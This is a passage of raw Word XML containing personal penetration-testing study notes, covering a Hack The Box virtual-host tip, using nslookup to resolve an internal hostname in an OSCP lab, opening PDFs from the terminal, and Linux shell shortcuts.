        <w:t xml:space="preserve">The root domain (bank.htb).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003348">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="638"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Different ports or IP addresses.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003349">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000334A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000334B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As seen from the Bank HTB, once you guess the virtual host (bank.htb), and then add 10.10.10.29 bank.htb into /etc/hosts, you can't just put 10.10.10.29 into the browser. You need to search bank.htb. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000334C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000334D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000334E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033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50">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_db452a4lpxa8" w:id="455"/>
      <w:bookmarkEnd w:id="455"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to find IP of a machine given its FQDN or hostname using nslookup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003351">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is how you look up IP of a machine </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003352">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1828800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="50" name="image43.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image43.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId112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3353">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nslookup INTERNALSRV1.BEYOND.COM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003354">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Ip is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">172.16.6.241</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003355">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Address: 172.16.6.240 (the first entry) is the IP address of the DNS server that nslookup is querying, as hinted by the "Server: Unknown" thing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003356">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But it's showing the name as UnKnown because it can't reverse-resolve the IP 172.16.6.240 to a hostname using a PTR record.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003357">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from OSCP 27.4.1. Situational Awareness</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003358">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003359">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you provide just a hostname (like INTERNALSRV1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000335A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="748"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nslookup may append a default DNS suffix based on your system's configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000335B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="748"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For example, if your system is joined to the beyond.com domain or has beyond.com listed in its DNS search suffix list, it will try INTERNALSRV1.beyond.com.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000335C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000335D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is useful when you see a machine on Bloodhound but don't know it's IP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000335E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033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60">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003361">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5ycpbmxbmtpd" w:id="456"/>
      <w:bookmarkEnd w:id="456"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PDF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003362">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003363">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to open pdf from terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003364">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">open [file_name.pdf]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003365">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">evince [file_name.pdf]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003366">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xdg-open [file_name.pdf]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003367">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003368">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003369">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000336A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000336B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000033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6D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000336E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_roxdx2f8hdv5" w:id="457"/>
      <w:bookmarkEnd w:id="457"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux General</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000336F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">amd64 just means 64-bit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003370">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">386 means 32-bit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003371">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">aarch64 means you're on an ARM 64-bit architecture</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003372">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003373">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tabs in Terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="199"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can use CTRL + T to add tabs in the terminal </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003375">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="199"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can double click on a tab to re-name it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003376">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003377">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check if a specific service is running:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003378">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="654"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ps aux | grep [name_of_service]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003379">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000337A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Navigate word by word:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000337B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="350"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Alt+F</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: moves one word forward</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000337C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="350"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Alt+B</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: moves one word back</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000337D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000337E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Delete Entire Words:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000337F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="464"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + W</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Deletes the word to the left of the cursor.</w:t>
      </w:r>
    </w:p>
